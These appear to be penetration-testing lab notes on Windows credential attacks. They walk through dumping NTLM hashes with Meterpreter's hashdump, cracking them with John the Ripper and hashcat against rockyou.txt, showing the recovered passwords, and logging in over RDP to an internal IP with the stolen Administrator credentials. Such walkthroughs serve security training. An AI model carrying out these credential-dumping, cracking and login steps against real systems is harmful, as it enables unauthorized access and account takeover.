Windows Hash cracking
Dumping Hashes
❗ In order to set up persistence, administrative privileges are required.
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Open a new tab and create a .txt file (hashes.txt) with the dumped hashes. Paste the Administrator and bob hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1009:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
# Cracking Hashes
The Metasploit auxiliary/analyze/crack_windows module can also be used to brute-force the hashes.
# John The Ripper
In this case John The Ripper will be used as an example.
john - Open Source password security auditing and password recovery tool available for many operating systems
john --list=formats | grep NT
netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, o10glogon
john --format=NT hashes.txt
# Without --wordlist, john runs its default modes: single crack, then its built-in password.lst wordlist, then incremental

Use the rockyou.txt wordlist instead:
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Hashcat
hashcat - Open Source advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms
Crack the NTLM hashes with hashcat, using the rockyou.txt wordlist (attack mode 0 is the dictionary attack; -a 3 is mask/brute-force mode and would read the wordlist as a mask file; -m 1000 selects NTLM):
hashcat -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
# Show the cracked hashes recorded in the potfile
hashcat -m 1000 --show hashes.txt
8846f7eaee8fb117ad06bdd830b7586c:password
5835048ce94ad0564e29a924a03510ef:password1

Try an RDP login with the recovered credentials:
xfreerdp /u:Administrator /p:password /v:10.2.24.37